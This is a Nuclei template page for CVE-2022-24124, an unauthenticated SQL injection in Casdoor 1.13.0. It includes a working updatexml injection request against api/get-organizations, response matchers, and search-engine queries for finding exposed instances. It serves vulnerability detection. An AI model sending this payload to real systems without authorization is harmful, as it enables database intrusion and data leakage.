Skip to content
Nuclei Templates

Casdoor 1.13.0 - Unauthenticated SQL Injection

ID: CVE-2022-24124

Severity: high

Author: cckuailong

Tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin

Description

Section titled “Description”

Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-24124


info:
  name: Casdoor 1.13.0 - Unauthenticated SQL Injection
  author: cckuailong
  severity: high
  description: Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized accessand data leakage.
  remediation: |
    Upgrade to a patched version of Casdoor or apply the necessary security patches to mitigate the SQL injection vulnerability.
  reference:
    - https://packetstormsecurity.com/files/166163/Casdoor-1.13.0-SQL-Injection.html
    - https://www.exploit-db.com/exploits/50792
    - https://github.com/cckuailong/reapoc/tree/main/2022/CVE-2022-24124/vultarget
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24124
    - https://github.com/casdoor/casdoor/compare/v1.13.0...v1.13.1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24124
    cwe-id: CWE-89
    epss-score: 0.08991
    epss-percentile: 0.94589
    cpe: cpe:2.3:a:casbin:casdoor:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: casbin
    product: casdoor
    shodan-query:
      - http.title:"Casdoor"
      - http.title:"casdoor"
    fofa-query: title="casdoor"
    google-query: intitle:"casdoor"
  tags: cve,cve2022,sqli,unauth,packetstorm,edb,casdoor,casbin


http:
  - method: GET
    path:
      - "{{BaseURL}}/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)"


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "XPATH syntax error.*&#39"
          - "casdoor"
        condition: and


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ce0ac496f3dce2e33c0e29ed784535d9334fec338a80459b7cad8de90fa8fb4f022039f5260e8de6ba81cbc08f15d7974e7296cf00f7272668ed7078d71eefc89b6c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24124.yaml"

View on Github